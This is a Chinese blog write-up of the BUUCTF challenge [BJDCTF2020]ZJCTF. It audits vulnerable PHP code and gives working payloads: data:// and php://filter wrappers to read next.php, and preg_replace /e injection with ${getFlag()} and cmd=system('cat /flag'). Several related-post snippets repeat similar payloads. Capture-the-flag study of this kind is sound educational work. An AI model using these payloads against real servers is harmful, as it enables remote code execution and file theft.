BUUCTF[BJDCTF2020]ZJCTF,不过如此

最新推荐文章于 2024-01-24 21:31:22 发布
最新推荐文章于 2024-01-24 21:31:22 发布
阅读量348 收藏 2
点赞数 2
分类专栏: CTF 文章标签: php 正则表达式
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LSYZWF/article/details/120724878
版权

文章目录

题目

链接:https://buuoj.cn/challenges#[BJDCTF2020]ZJCTF%EF%BC%8C%E4%B8%8D%E8%BF%87%E5%A6%82%E6%AD%A4

解答

1、审计代码

<?php

error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        die("Not now!");
    }

    include($file);  //next.php
    
}
else{
    highlight_file(__FILE__);
}
?>

需要想办法绕过file_get_contents,想到可以使用data:/text/plain或者php://input
同时对于include可以伪协议进行读取next.php
2、抓包,构造payload
在这里插入图片描述
在这里插入图片描述
3、base64解码得到

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}


foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
	@eval($_GET['cmd']);
}

4、继续审计以下代码
这里主要涉及到preg_replace加上后缀/e,指的是如果匹配到了,就会将preg_replace的第二个参数当做php代码执行
同时需要了解正则的相关知识
首先给出payload吧,相关解释在知识点中给出

next.php?\S*=${getFlag()}&cmd=system('cat /flag');

next.php?\S*=${getflag()}&cmd=show_source('/flag');

next.php?\S%2b=${getFlag()}&cmd=system('cat+/flag');

得到flag
在这里插入图片描述

知识点

1、preg_replace:
功能 : 函数执行一个正则表达式的搜索和替换

preg_replace ( mixed $pattern , mixed $replacement , mixed $subject)
搜索 subject 中匹配 pattern 的部分, 如果匹配成功以 replacement 进行替换
PHP小于5.5的版本中,$pattern 存在 /e 模式修正符,允许代码执行
/e 模式修正符,使 preg_replace() 将 $replacement 当做php代码来执行

而此题如果匹配成功,就会执行strtolower("\1");’

2、\1经转义就变成\1,而\1在正则表达式中表示自己
参考链接:正则反向引用

这里的 \1 实际上指定的是第一个子匹配项,即(’ . $re . ')中所匹配到的内容。

大致思路:
代码中定义了函数getFlag而没有调用,所以需要想办法调用此函数,再通过cmd传递参数,此参数为需要执行的命令

3、表达式 .* 就是单个字符匹配任意,即贪婪匹配。
表达式 .*? 是满足条件的情况只匹配一次,即最小匹配.
\s 匹配任何空白非打印字符,包括空格、制表符、换页符等等。等价于 [ \f\n\r\t\v]。注意 Unicode 正则表达式会匹配全角空格符。
\S 匹配任何非空白非打印字符。等价于 [^ \f\n\r\t\v]。

构造payload的格式如下:

/?.*=${执行的命令}

preg_replace('/(' . $re . ')/ei','strtolower("\\1")',$str);   // 原先的语句

preg_replace('/(.*)/ei','strtolower("\\1")',${执行的命令});     // 之后的语句

preg_replace('/(\S*)/ei','strtolower("\\1")',${执行的命令});    // 或者构造语句

最终payload:

next.php?\S*=${getFlag()}&cmd=system('cat /flag');

next.php?\S*=${getflag()}&cmd=show_source('/flag');

next.php?\S%2b=${getFlag()}&cmd=system('cat+/flag');

那么,为什么不使用.*而要使用\S*呢?

由Get传入,当以非法字符**(.)**开头的参数就会自动转为下划线,导致匹配失败

4、至于为什么使用${执行的命令}
在PHP语言中,单引号和双引号都可以表示一个字符串,但是对于双引号来说,可能会对引号内的内容进行二次解释
而在双引号中倘若有${}出现,那么{}内的内容将被当做php代码块来执行。

preg_replace /e 的这种模式在 php7 是已经被取消了的

参考文章:https://www.cesafe.com/html/6999.html
https://www.freesion.com/article/31021162600/
https://blog.csdn.net/weixin_49656607/article/details/119833707

DiliLearngent
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF逆向前八题
01-24
内容为BUUCTF里reserve的前八题自己的一些解题思路
[BJDCTF2020]ZJCTF不过如此
05-07 352
<?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br>"; if(preg_mat.
[BUUCTF][BJDCTF2020]ZJCTF不过如此1(做题记录
qq_48597181的博客
04-05 714
作为正则表达式匹配条件的参数名且这个参数值为的"getFlag();参数名:cmd和需要php执行的代码所以构造id=1&\S*={${getFlag()}}&cmd=system('linux命令');PS:\S是什么意思?正则表达式\S匹配非空字符PS: 为什么用{${getFlag()}} 这个写法?会调用phpinfo()函数并试图将结果嵌入到字符串中。而如果使用phpinfo()函数,它不会自动嵌入到字符串中。(我在这试了好久TAT。
php string ctf,PHP字符解析特性绕WAF【buuctf题 easy calc】
weixin_39939601的博客
03-11 296
一、PHP字符串解析特性PHP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会:1.删除空白符2.将某些字符转换为下划线(包括空格)例如,/?%20news[id%00=42会转换为Array([news_id] => 42),然后参数%20news[id%00的值将存储到$_GET["news_id"]中。(URL编码%20是空格,%00是0)例如:User inputDec...
[BJDCTF2020]ZJCTF不过如此(特详解)
热门推荐
qq_74806534的博客
01-24 1万+
而这段代码里面的第一个子匹配项就是${phpinfo()}。编码设定,这是一个可选项,base64 编码中仅包含 0-9,a-z,A-Z,+,/,=,其中 = 是用来编码补白的。我们先看第二个参数中的\1 ,\1实际上就是 \1,而 \1 在正则表达式中有自己的含义,最后一部分为这个 Data URI 承载的内容,它可以是纯文本编写的内容,也可以是经过 base64编码 的内容。单引号中的变量不会被处理。这里我们发现了.变成了_,这是因为php会将传入的非法的参数名转成下滑线,所以我们的正则匹配才会失效。
BasicASM.s(BUUCTF
06-04
分析过程文件
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
变量覆盖漏洞 自定义的参数值替换原有变量值的情况称为变量覆盖漏洞 经常导致变量覆盖漏洞场景有:$使用不当,extract()函数使用不当,parse_str()函数使用不当,import_request_variables()使用不当,开启了全局...
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
最新发布
04-09
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分,
[BJDCTF2020]ZJCTF不过如此 1
shinygod的博客
03-02 491
知识点:伪协议php://input 参考:深入研究preg_replace与代码执行 读源码 file_get_contents()函数打开text参数,以及后面的文件包含函数,用data伪协议和php伪协议传 text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php <?php $id = $_GET['id']; $_SESSION['id'] = $i
buuctf-ZJCTF不过如此
m0_62094846的博客
11-21 2665
这是文件包含 ?text=data://text/plain;base64,SSBoYXZlIGEgZHJlYW0=&file=php://filter/read=convert.base64-encode/resource=next.php 前面一段是使用data://伪协议,后面的是读取文件信息 解码得到 这是关于preg_replace的内容 <?php $id = $_GET['id']; $_SESSION['id'] = $id; function...
BUUCTF-web类-[BJDCTF2020]ZJCTF不过如此
weixin_44622228的博客
04-20 1924
BUUCTF-web类-[BJDCTF2020]ZJCTF不过如此 分析代码,ge传入两个参数text和file,text参数利用file_get_contents()函数只读形式打开,打开后内容要与"I have a dream"字符串相匹配,才能执行下面的文件包含$file参数。 看到用的是file_get_contents()函数打开text参数,以及后面的文件包含函数,自然的想到php伪...
2020/7/15 - [BJDCTF2020]ZJCTF不过如此 - 伪协议、preg_replace /e模式命令执行
抒情诗
07-16 449
文章目录1.代码审计2.base后,再审计3.payload 根据开始的时候主页面给得php代码 1.代码审计 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_conten
[BJDCTF2020]ZJCTF不过如此 简单思路及做法
EC_Carrot的博客
12-07 838
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 题目 稍微审计,发现需要读到文件内容为I have a dream,自然而然的就可以想到用伪协议来做题! 注释里提醒了next.php,我们同样用伪协议base64加密来读文件 data://text/plain, php://input 读到的内容解码出来 <?php $id = $_GET['id']; $_SESSION['id'] =
buuctf [ZJCTF 2019]Login
carol2358的博客
05-06 1094
先运行,输入admin和2jctf_pa5sw0rd, 发现报错,gdb开始调试 在这里crash了, 去ida里看 ida里自己改名字,原来的看着太乱 反向分析 在read_password里找到var_18 然后通过覆盖var_18, 让他跳到程序自带的shell里 60-18 = 48 e+3a = 48 exp: from pwn import * from LibcSearc...
BUUCTF [BJDCTF2020]ZJCTF不过如此
Chu_Jian_Xiong的博客
09-29 569
[BJDCTF2020]ZJCTF不过如此考点PHP伪协议preg_replace远程代码执行实操 考点 PHP伪协议 https://www.cnblogs.com/wjrblogs/p/12285202.html preg_replace远程代码执行 https://zhuanlan.zhihu.com/p/47353283 实操 打开题目 乍一看,显然是一个PHP伪协议的题目,要求"I have a dream",以及提示包含next.php PD9waHAKJGlkID0gJF9HRVRb
【精】re正则表达式——速查表(大全)
走在搬砖的路上!
04-26 542
目录 校验数字的表达式 校验字符的表达式 开发中各种需求表达式 ◇◆◇◆◇ 校验数字的表达式 1. 数字:^[0-9]*$ 2. n位的数字:^\d{n}$ 3. 至少n位的数字:^\d{n,}$ 4. m-n位的数字:^\d{m,n}$ 5. 零和非零开头的数字:^(0|[1-9][0-9]*)$ 6. 非零开头的最多带两位小...
buuctf ACTF2020 Include
09-16
根据提供的引用内容,buuctf ACTF2020的Include功能可能存在文件包含漏洞。通过将URL中的参数修改为"?file=php://filter/convert.base64-encode/resource=flag.php",可以尝试读取flag.php文件并将其内容以Base64编码形式返回。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值